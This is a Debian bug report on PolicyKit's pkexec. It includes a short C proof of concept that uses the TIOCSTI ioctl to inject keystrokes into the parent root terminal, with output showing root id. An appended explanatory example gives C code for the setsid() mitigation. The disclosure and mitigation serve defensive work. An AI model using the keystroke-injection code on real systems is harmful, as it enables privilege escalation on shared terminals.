[Pkg-utopia-maintainers] Bug#812512: pkexec tty hijacking via TIOCSTI ioctl

up201407890 at alunos.dcc.fc.up.pt
Sun Jan 24 15:08:57 UTC 2016


Package: policykit-1
Version: all
Severity: important
File: /usr/bin/pkexec

When executing a program via "pkexec --user nonpriv program" the nonpriv session can escape to the parent session by using the TIOCSTI ioctl to push characters into the terminal's input buffer, allowing privilege escalation.
This issue has been fixed in "su" CVE-2005-4890 by calling setsid() and in "sudo" by using the "use_pty" flag.

$ cat test.c
#include <sys/ioctl.h>

int main()
{
  char *cmd = "id\n";
  while(*cmd)
   ioctl(0, TIOCSTI, cmd++);
}

$ gcc test.c -o test
$ id
uid=1000(saken) gid=1000(saken) groups=1000(saken)

# pkexec --user saken ./test ----> last command I typed in
id
# id ----> did not type this
uid=0(root) gid=0(root) groups=0(root)


I don't believe any of the previous mentions of fixes for "su" and "sudo" work here, since executing a shell via pkexec would make it not have job control.

I'm also requesting a CVE for this issue

Thanks,
Federico Bento
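The following is an added example illustrating the setsid() mitigation the report refers to; it is not part of the bug report or of PolicyKit. On Linux an unprivileged process may only use TIOCSTI on its own controlling terminal (a process with CAP_SYS_ADMIN bypasses that check), so a child that is placed in a new session with setsid() keeps the inherited stdin descriptor but can no longer inject keystrokes through it. The program below checks that condition with TIOCGSID (which fails with ENOTTY when the descriptor is not the caller's controlling tty) before and after detaching, and shows the su-style pattern of exec'ing a program in a new session. The function names are this example's own, and it assumes Linux with a POSIX C library.

```c
/* Constructed example: run a less-privileged program in a new session so that
 * its inherited stdin is no longer its controlling terminal. For an
 * unprivileged caller the kernel only accepts TIOCSTI on the caller's own
 * controlling tty, so a child detached with setsid() cannot push characters
 * into the parent's terminal. Linux-specific (TIOCGSID); the function names
 * are this example's own, not PolicyKit code. */
#include <stdio.h>
#include <sys/ioctl.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* 1 if fd is a tty that is the calling process's controlling terminal, else 0.
 * TIOCGSID fails with ENOTTY when fd is not a tty or is a tty that belongs to
 * another session; that is the same condition under which TIOCSTI is refused
 * to an unprivileged caller. */
int fd_is_controlling_tty(int fd)
{
    pid_t sid;
    return ioctl(fd, TIOCGSID, &sid) == 0;
}

/* Fork, detach the child with setsid(), and report whether fd 0 is still the
 * child's controlling tty. Returns 0 when the detach works, -1 on error. */
int controlling_tty_after_setsid(void)
{
    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        /* A freshly forked child is not a process-group leader, so setsid()
         * cannot fail with EPERM here. */
        if (setsid() == (pid_t)-1)
            _exit(2);
        _exit(fd_is_controlling_tty(STDIN_FILENO));
    }
    int status;
    if (waitpid(pid, &status, 0) < 0 || !WIFEXITED(status))
        return -1;
    return WEXITSTATUS(status) == 2 ? -1 : WEXITSTATUS(status);
}

/* The su-style fix cited in the report: exec argv in a new session. Returns
 * the child's exit status, or -1 if it could not be run or did not exit
 * normally. Caveat noted by the reporter: a shell started this way has no
 * controlling terminal and therefore no job control. */
int spawn_in_new_session(char *const argv[])
{
    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        if (setsid() == (pid_t)-1)
            _exit(127);
        execvp(argv[0], argv);
        _exit(127); /* exec failed */
    }
    int status;
    if (waitpid(pid, &status, 0) < 0 || !WIFEXITED(status))
        return -1;
    return WEXITSTATUS(status);
}

int main(int argc, char **argv)
{
    printf("stdin is this process's controlling tty: %d\n",
           fd_is_controlling_tty(STDIN_FILENO));
    printf("stdin is the child's controlling tty after setsid(): %d\n",
           controlling_tty_after_setsid());
    if (argc > 1) {
        /* Usage: ./detach <program> [args...] runs program in a new session. */
        int rc = spawn_in_new_session(argv + 1);
        printf("child exited with status %d\n", rc);
        return rc < 0 ? 1 : rc;
    }
    return 0;
}
```

Run from an interactive terminal, the first line prints 1 and the second 0: the child still holds the same tty descriptor, but it is no longer that child's controlling terminal, so TIOCSTI from it would fail with EPERM. The cost is the one the reporter points out: with no controlling terminal the child receives no SIGINT from Ctrl-C and an interactive shell has no job control, which is why sudo's use_pty approach of running the command on a fresh pseudo-terminal is the more usable design. On kernels 6.2 and later the sysctl dev.tty.legacy_tiocsti can be set to 0 to disable TIOCSTI system-wide instead.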



